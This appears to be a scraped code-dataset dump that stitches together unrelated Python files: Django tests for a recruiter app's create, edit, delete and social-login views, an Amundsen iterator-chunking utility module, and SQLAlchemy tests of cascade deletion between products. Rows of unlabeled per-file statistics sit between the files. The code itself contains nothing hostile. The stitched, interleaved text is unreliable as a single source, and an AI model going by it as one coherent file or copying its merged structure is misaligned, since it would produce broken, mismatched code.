self.assertEqual(error_data, expected_errors)
response = self.client.post(reverse('recruiter:company_recruiter_create'),
data={'email': 'testrecruiter1@mp.com',
'job_role': 'developer',
'first_name': 'testreruiter',
'password': 'Mp1234@', 'mobile': '9010757124'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {
'response': {'mobile': ['This field is required.']}, 'error': True}
self.assertTrue(error_data, expected_errors)
def test_company_recruiter_edit(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
self.url = reverse('recruiter:edit_company_recruiter', kwargs={
'recruiter_id': self.company_recruiter.id})
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/company/create_recruiter.html')
response = self.client.get(
reverse('recruiter:edit_company_recruiter', kwargs={'recruiter_id': '100'}))
self.assertEqual(response.status_code, 404)
response = self.client.post(reverse('recruiter:edit_company_recruiter', kwargs={'recruiter_id': '100'}),
data={'mobile': '0987654321',
'email': self.company_recruiter.email,
'job_role': 'developer123',
'first_name': 'testreruiter123',
'password': 'Mp1234@'})
self.assertEqual(response.status_code, 404)
def test_company_recruiter_delete(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
self.url = reverse('recruiter:delete_company_recruiter', kwargs={
'recruiter_id': self.company_recruiter.id})
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {
'error': False, 'response': 'Recruiter Deleted Successfully'}
self.assertEqual(error_data, expected_errors)
response = self.client.get(
reverse('recruiter:delete_company_recruiter', kwargs={'recruiter_id': '100'}))
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {'error': True, 'response': 'Some Problem Occurs'}
self.assertEqual(error_data, expected_errors)
def test_interview_location(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
response = self.client.post(reverse('recruiter:interview_location', kwargs={
'location_count': '1'}), data={'selected_locations': '1'})
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/job/add_interview_location.html')
def test_twitter_logins(self):
response = self.client.post(reverse('recruiter:twitter_login'))
self.assertEqual(response.status_code, 302)
def test_facebook_login(self):
response = self.client.post(reverse('recruiter:facebook_login'))
self.assertEqual(response.status_code, 302)
def test_linkedin_login(self):
response = self.client.post(reverse('recruiter:linkedin_login'))
self.assertEqual(response.status_code, 302)
def test_google_login(self):
response = self.client.post(reverse('recruiter:google_connect'))
self.assertEqual(response.status_code, 302)
| 58.863257
| 152
| 0.44641
| 9,049
| 112,782
| 5.349873
| 0.045419
| 0.043069
| 0.051786
| 0.065295
| 0.90151
| 0.880172
| 0.86691
| 0.849414
| 0.832848
| 0.812191
| 0
| 0.024193
| 0.442198
| 112,782
| 1,915
| 153
| 58.893995
| 0.745335
| 0.016279
| 0
| 0.77491
| 0
| 0
| 0.224985
| 0.045783
| 0
| 0
| 0
| 0
| 0.131453
| 1
| 0.033013
| false
| 0.039016
| 0.004202
| 0
| 0.044418
| 0.0006
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4c6e568cdd83bb768e17d17c023c0df9ecc2be94
| 14,739
|
py
|
Python
|
amundsengremlin/amundsen_gremlin/utils/streams.py
|
evenlwanvik/RD-dataplatform-datakatalog
|
3f46978c4b50c032299940a196f61613f935e529
|
[
"Apache-2.0"
] | 19
|
2020-09-13T04:23:16.000Z
|
2022-01-20T13:48:41.000Z
|
amundsengremlin/amundsen_gremlin/utils/streams.py
|
evenlwanvik/RD-dataplatform-datakatalog
|
3f46978c4b50c032299940a196f61613f935e529
|
[
"Apache-2.0"
] | 13
|
2020-09-18T19:15:19.000Z
|
2022-01-13T22:45:43.000Z
|
amundsengremlin/amundsen_gremlin/utils/streams.py
|
evenlwanvik/RD-dataplatform-datakatalog
|
3f46978c4b50c032299940a196f61613f935e529
|
[
"Apache-2.0"
] | 12
|
2020-09-04T19:22:25.000Z
|
2022-01-13T20:41:39.000Z
|
# Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import logging
import threading
from typing import (
Any, AsyncIterator, Callable, Collection, Iterable, Iterator, List,
Optional, Tuple, TypeVar, Union
)
from typing_extensions import Final, final
LOGGER = logging.getLogger(__name__)
V = TypeVar('V')
R = TypeVar('R')
def one(ignored: Any) -> int:
return 1
class PeekingIterator(Iterator[V]):
"""
Like Iterator, but with peek(), peek_default(), and take_peeked()
"""
def __init__(self, iterable: Iterable[V]):
self.it: Final[Iterator[V]] = iterable if isinstance(iterable, Iterator) else iter(iterable)
self.has_peeked_value = False
self.peeked_value: Optional[V] = None
# RLock could make sense, but it would be just weird for the same thread to try to peek from same blocking
# iterator
self.lock: Final[threading.Lock] = threading.Lock()
@final
# @overrides Iterator but @overrides doesn't like
def __next__(self) -> V:
"""
:return: the previously peeked value or the next
:raises StopIteration if there is no more values
"""
with self.lock:
value: V
if self.has_peeked_value:
value = self.peeked_value # type: ignore
self.peeked_value = None
self.has_peeked_value = False
else:
value = next(self.it)
assert not self.has_peeked_value
return value
@final
def peek(self) -> V:
"""
:return: the previously peeked value or the next
:raises StopIteration if there is no more values
"""
with self.lock:
if not self.has_peeked_value:
self.peeked_value = next(self.it)
self.has_peeked_value = True
assert self.has_peeked_value
return self.peeked_value # type: ignore
@final
def peek_default(self, default: Optional[V]) -> Optional[V]:
"""
:return: the previously peeked value or the next, or default if no more values
"""
try:
return self.peek()
except StopIteration:
return default
@final
def take_peeked(self, value: V) -> None:
with self.lock:
assert self.has_peeked_value, f'expected to find a peaked value'
assert self.peeked_value is value, f'expected the peaked value to be the same'
self.peeked_value = None
self.has_peeked_value = False
@final
def has_more(self) -> bool:
try:
self.peek()
return True
except StopIteration:
return False
class PeekingAsyncIterator(AsyncIterator[V]):
"""
Like AsyncIterator, but with peek(), peek_default(), and take_peeked()
"""
def __init__(self, iterable: AsyncIterator[V]):
self.it: Final[AsyncIterator[V]] = iterable
self.has_peeked_value = False
self.peeked_value: Optional[V] = None
# RLock could make sense, but it would be just weird for the same thread to try to peek from same blocking
# iterator
self.lock: Final[threading.Lock] = threading.Lock()
@final
# @overrides AsyncIterator but @overrides doesn't like
async def __anext__(self) -> V:
"""
:return: the previously peeked value or the next
:raises StopAsyncIteration if there is no more values
"""
with self.lock:
value: V
if self.has_peeked_value:
value = self.peeked_value # type: ignore
self.peeked_value = None
self.has_peeked_value = False
else:
value = await self.__anext__()
assert not self.has_peeked_value
return value
@final
async def peek(self) -> V:
"""
:return: the previously peeked value or the next
:raises StopAsyncIteration if there is no more values
"""
with self.lock:
if not self.has_peeked_value:
self.peeked_value = await self.it.__anext__()
self.has_peeked_value = True
assert self.has_peeked_value
return self.peeked_value # type: ignore
@final
async def peek_default(self, default: Optional[V]) -> Optional[V]:
"""
:return: the previously peeked value or the next, or default if no more values
"""
try:
return await self.peek()
except StopAsyncIteration:
return default
@final
def take_peeked(self, value: V) -> None:
with self.lock:
assert self.has_peeked_value, f'expected to find a peaked value'
assert self.peeked_value is value, f'expected the peaked value to be the same'
self.peeked_value = None
self.has_peeked_value = False
@final
async def has_more(self) -> bool:
try:
await self.peek()
return True
except StopAsyncIteration:
return False
def one_chunk(*, it: PeekingIterator[V], n: int, metric: Callable[[V], int]) -> Tuple[Iterable[V], bool]:
"""
:param it: stream of values as a PeekingIterator (or regular iterable if you are only going to take the first chunk
and don't care about the peeked value being consumed)
:param n: consume stream until n is reached. if n is 0, process whole stream as one chunk.
:param metric: the callable that returns positive metric for a value
:returns the chunk
"""
items: List[V] = []
items_metric: int = 0
try:
while True:
item = it.peek()
item_metric = metric(item)
# negative would be insane, let's say positive
assert item_metric > 0, \
f'expected metric to be positive! item_metric={item_metric}, metric={metric}, item={item}'
if not items and item_metric > n:
# should we assert instead? it's probably a surprise to the caller too, and might fail for whatever
# limit they were trying to avoid, but let's give them a shot at least.
LOGGER.error(f"expected a single item's metric to be less than the chunk limit! {item_metric} > {n}, "
f"but returning to make progress")
items.append(item)
it.take_peeked(item)
items_metric += item_metric
break
elif items_metric + item_metric <= n:
items.append(item)
it.take_peeked(item)
items_metric += item_metric
if items_metric >= n:
# we're full
break
# else keep accumulating
else:
assert items_metric + item_metric > n
# we're full
break
# don't catch exception, let that be a concern for callers
except StopIteration:
pass
has_more = it.has_more()
return tuple(items), has_more
def chunk(it: Union[Iterable[V], PeekingIterator[V]], n: int, metric: Callable[[V], int] = one
) -> Iterable[Iterable[V]]:
"""
:param it: stream of values as a PeekingIterator (or regular iterable if you are only going to take the first chunk
and don't care about the peeked value being consumed)
:param n: consume stream until n is reached. if n is 0, process whole stream as one chunk.
:param metric: the callable that returns positive metric for a value
:returns the Iterable (generator) of chunks
"""
if not isinstance(it, PeekingIterator):
it = PeekingIterator(it)
assert isinstance(it, PeekingIterator)
has_more: bool = True
while has_more:
items, has_more = one_chunk(it=it, n=n, metric=metric)
if items or has_more:
yield items
async def async_one_chunk(
it: PeekingAsyncIterator[V], n: int, metric: Callable[[V], int] = one) -> Tuple[Iterable[V], bool]:
"""
:param it: stream of values as a PeekingAsyncIterator
:param n: consume stream until n is reached. if n is 0, process whole stream as one chunk.
:param metric: the callable that returns positive metric for a value
:returns the chunk and if there are more items
"""
items: List[V] = []
items_metric: int = 0
if not isinstance(it, PeekingAsyncIterator):
it = PeekingAsyncIterator(it)
assert isinstance(it, PeekingAsyncIterator)
try:
while True:
item = await it.peek()
item_metric = metric(item)
# negative would be insane, let's say positive
assert item_metric > 0, \
f'expected metric to be positive! item_metric={item_metric}, metric={metric}, item={item}'
if not items and item_metric > n:
# should we assert instead? it's probably a surprise to the caller too, and might fail for whatever
# limit they were trying to avoid, but let's give them a shot at least.
LOGGER.error(f"expected a single item's metric to be less than the chunk limit! {item_metric} > {n}, "
f"but returning to make progress")
items.append(item)
it.take_peeked(item)
items_metric += item_metric
break
elif items_metric + item_metric <= n:
items.append(item)
it.take_peeked(item)
items_metric += item_metric
if items_metric >= n:
# we're full
break
# else keep accumulating
else:
assert items_metric + item_metric > n
# we're full
break
# don't catch exception, let that be a concern for callers
except StopAsyncIteration:
pass
has_more = await it.has_more()
return tuple(items), has_more
async def async_chunk(*, it: Union[AsyncIterator[V], PeekingAsyncIterator[V]], n: int, metric: Callable[[V], int]
) -> AsyncIterator[Iterable[V]]:
"""
:param it: stream of values as a PeekingAsyncIterator
:param n: consume stream until n is reached. if n is 0, process whole stream as one chunk.
:param metric: the callable that returns positive metric for a value
:returns the chunk and if there are more items
"""
if not isinstance(it, PeekingAsyncIterator):
it = PeekingAsyncIterator(it)
assert isinstance(it, PeekingAsyncIterator)
has_more: bool = True
while has_more:
items, has_more = await async_one_chunk(it=it, n=n, metric=metric)
if items or has_more:
yield items
def reduce_in_chunks(*, stream: Iterable[V], n: int, initial: R,
consumer: Callable[[Iterable[V], R], R], metric: Callable[[V], int] = one) -> R:
"""
:param stream: stream of values
:param n: consume stream until n is reached. if n is 0, process whole stream as one chunk.
:param metric: the callable that returns positive metric for a value
:param initial: the initial state
:param consumer: the callable to handle the chunk
:returns the final state
"""
if n > 0:
it = PeekingIterator(stream)
state = initial
for items in chunk(it=it, n=n, metric=metric):
state = consumer(items, state)
return state
else:
return consumer(stream, initial)
async def async_reduce_in_chunks(*, stream: AsyncIterator[V], n: int, metric: Callable[[V], int], initial: R,
consumer: Callable[[Iterable[V], R], R]) -> R:
"""
:param stream:
:param n: if n is 0, process whole stream as one chunk
:param metric: the callable that returns positive metric for a value
:param initial: the initial state
:param consumer: the callable to handle the chunk
:returns the final state
"""
if n > 0:
it = PeekingAsyncIterator(stream)
state = initial
async for items in async_chunk(it=it, n=n, metric=metric):
state = consumer(items, state)
return state
else:
return consumer(tuple([_ async for _ in stream]), initial)
def consume_in_chunks(*, stream: Iterable[V], n: int, consumer: Callable[[Iterable[V]], None],
metric: Callable[[V], int] = one) -> int:
"""
:param stream:
:param n: consume stream until n is reached if n is 0, process whole stream as one chunk
:param metric: the callable that returns positive metric for a value
:param consumer: the callable to handle the chunk
:return:
"""
_actual_state: int = 0
def _consumer(things: Iterable[V], ignored: None) -> None:
nonlocal _actual_state
things = _assure_collection(things)
assert isinstance(things, Collection) # appease the types
_actual_state += len(things)
consumer(things)
reduce_in_chunks(stream=stream, n=n, initial=None, consumer=_consumer, metric=metric)
return _actual_state
# NB: This will not work on python 3.6; requires 3.7 or later
async def async_consume_in_chunks(*, stream: AsyncIterator[V], n: int, consumer: Callable[[Iterable[V]], None],
metric: Callable[[V], int] = one) -> int:
_actual_state: int = 0
def _consumer(things: Iterable[V], ignored: None) -> None:
nonlocal _actual_state
things = _assure_collection(things)
assert isinstance(things, Collection) # appease the types
_actual_state += len(things)
consumer(things)
await async_reduce_in_chunks(stream=stream, n=n, initial=None, consumer=_consumer, metric=metric)
return _actual_state
def consume_in_chunks_with_state(*, stream: Iterable[V], n: int, consumer: Callable[[Iterable[V]], None],
state: Callable[[V], R], metric: Callable[[V], int] = one) -> Iterable[R]:
_actual_state: List[R] = list()
def _consumer(things: Iterable[V], ignored: None) -> None:
nonlocal _actual_state
things = _assure_collection(things)
assert isinstance(things, Collection) # appease the types
_actual_state.extend(map(state, things))
consumer(things)
reduce_in_chunks(stream=stream, n=n, initial=None, consumer=_consumer, metric=metric)
return tuple(_actual_state)
def _assure_collection(iterable: Iterable[V]) -> Collection[V]:
if isinstance(iterable, Collection):
return iterable
else:
return tuple(iterable)
| 37.59949
| 119
| 0.609675
| 1,867
| 14,739
| 4.70166
| 0.110873
| 0.050125
| 0.026658
| 0.03691
| 0.821486
| 0.809182
| 0.797676
| 0.779904
| 0.749487
| 0.728982
| 0
| 0.00215
| 0.305855
| 14,739
| 391
| 120
| 37.695652
| 0.85583
| 0.1954
| 0
| 0.704918
| 0
| 0.008197
| 0.053114
| 0.005022
| 0
| 0
| 0
| 0
| 0.07377
| 1
| 0.07377
| false
| 0.008197
| 0.016393
| 0.004098
| 0.196721
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d5dd15c91bca01a5a0d6d1b1c9ab65b075634452
| 7,433
|
py
|
Python
|
tests/models/product/product_relations/test_delete_cascade.py
|
simonsobs/acondbs
|
6ca11c2889d827ecdb2b54d0cf3b94b8cdd281e6
|
[
"MIT"
] | null | null | null |
tests/models/product/product_relations/test_delete_cascade.py
|
simonsobs/acondbs
|
6ca11c2889d827ecdb2b54d0cf3b94b8cdd281e6
|
[
"MIT"
] | 24
|
2020-04-02T19:29:07.000Z
|
2022-03-08T03:05:43.000Z
|
tests/models/product/product_relations/test_delete_cascade.py
|
simonsobs/acondbs
|
6ca11c2889d827ecdb2b54d0cf3b94b8cdd281e6
|
[
"MIT"
] | 1
|
2020-04-08T15:48:28.000Z
|
2020-04-08T15:48:28.000Z
|
from acondbs.db.sa import sa
from acondbs.models import Product, ProductRelation
##__________________________________________________________________||
def test_cascade_delete_children(app):
# +--------+
# --(child)--> | |
# | | child1 |
# +---------+ <-(parent)-- | |
# | | +--------+
# | parent1 |
# | | +--------+
# +---------+ --(child)--> | |
# | | child2 |
# <-(parent)-- | |
# +--------+
# delete child1
with app.app_context():
child1 = Product.query.filter_by(name="child1").one_or_none()
sa.session.delete(child1)
sa.session.commit()
#
#
#
# +---------+
# | |
# | parent1 |
# | | +--------+
# +---------+ --(child)--> | |
# | | child2 |
# <-(parent)-- | |
# +--------+
# assert
with app.app_context():
parent1 = Product.query.filter_by(name="parent1").one_or_none()
child1 = Product.query.filter_by(name="child1").one_or_none()
child2 = Product.query.filter_by(name="child2").one_or_none()
assert parent1 is not None
assert child1 is None
assert child2 is not None
relations = ProductRelation.query.all()
assert 2 == len(relations)
assert 1 == len(parent1.relations)
assert child2 == parent1.relations[0].other
assert parent1 == child2.relations[0].other
assert parent1.relations[0].reverse == child2.relations[0]
# delete child2
with app.app_context():
child2 = Product.query.filter_by(name="child2").one_or_none()
sa.session.delete(child2)
sa.session.commit()
#
# +---------+
# | |
# | parent1 |
# | |
# +---------+
#
# assert
with app.app_context():
parent1 = Product.query.filter_by(name="parent1").one_or_none()
child1 = Product.query.filter_by(name="child1").one_or_none()
child2 = Product.query.filter_by(name="child2").one_or_none()
assert parent1 is not None
assert child1 is None
assert child2 is None
relations = ProductRelation.query.all()
assert 0 == len(relations)
assert 0 == len(parent1.relations)
##__________________________________________________________________||
def test_cascade_delete_parent(app):
# +--------+
# --(child)--> | |
# | | child1 |
# +---------+ <-(parent)-- | |
# | | +--------+
# | parent1 |
# | | +--------+
# +---------+ --(child)--> | |
# | | child2 |
# <-(parent)-- | |
# +--------+
# delete parent1
with app.app_context():
parent1 = Product.query.filter_by(name="parent1").first()
sa.session.delete(parent1)
sa.session.commit()
# +--------+
# | |
# | child1 |
# | |
# +--------+
#
# +--------+
# | |
# | child2 |
# | |
# +--------+
# assert
with app.app_context():
parent1 = Product.query.filter_by(name="parent1").one_or_none()
child1 = Product.query.filter_by(name="child1").one_or_none()
child2 = Product.query.filter_by(name="child2").one_or_none()
assert parent1 is None
assert child1 is not None
assert child2 is not None
relations = ProductRelation.query.all()
assert 0 == len(relations)
##__________________________________________________________________||
def test_cascade_delete_relations(app):
# +--------+
# --(child)--> | |
# | | child1 |
# +---------+ <-(parent)-- | |
# | | +--------+
# | parent1 |
# | | +--------+
# +---------+ --(child)--> | |
# | | child2 |
# <-(parent)-- | |
# +--------+
# delete the relation from child1 to parent1
with app.app_context():
child1 = Product.query.filter_by(name="child1").one_or_none()
sa.session.delete(child1.relations[0])
sa.session.commit()
# +--------+
# | |
# | child1 |
# +---------+ | |
# | | +--------+
# | parent1 |
# | | +--------+
# +---------+ --(child)--> | |
# | | child2 |
# <-(parent)-- | |
# +--------+
# assert
with app.app_context():
parent1 = Product.query.filter_by(name="parent1").one_or_none()
child1 = Product.query.filter_by(name="child1").one_or_none()
child2 = Product.query.filter_by(name="child2").one_or_none()
assert parent1 is not None
assert child1 is not None
assert child2 is not None
relations = ProductRelation.query.all()
assert 2 == len(relations)
assert 1 == len(parent1.relations)
assert child2 == parent1.relations[0].other
assert parent1 == child2.relations[0].other
assert parent1.relations[0].reverse == child2.relations[0]
# delete the relation from parent1 to child2
with app.app_context():
parent1 = Product.query.filter_by(name="parent1").one_or_none()
sa.session.delete(parent1.relations[0])
sa.session.commit()
# +--------+
# | |
# | child1 |
# +---------+ | |
# | | +--------+
# | parent1 |
# | | +--------+
# +---------+ | |
# | child2 |
# | |
# +--------+
# assert
with app.app_context():
parent1 = Product.query.filter_by(name="parent1").one_or_none()
child1 = Product.query.filter_by(name="child1").one_or_none()
child2 = Product.query.filter_by(name="child2").one_or_none()
assert parent1 is not None
assert child1 is not None
assert child2 is not None
relations = ProductRelation.query.all()
assert 0 == len(relations)
##__________________________________________________________________||
| 33.481982
| 71
| 0.404413
| 534
| 7,433
| 4.990637
| 0.08427
| 0.090056
| 0.135084
| 0.150094
| 0.89531
| 0.860788
| 0.849531
| 0.82364
| 0.82364
| 0.746717
| 0
| 0.028688
| 0.437239
| 7,433
| 221
| 72
| 33.633484
| 0.608415
| 0.431185
| 0
| 0.822785
| 0
| 0
| 0.03078
| 0
| 0
| 0
| 0
| 0
| 0.367089
| 1
| 0.037975
| false
| 0
| 0.025316
| 0
| 0.063291
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.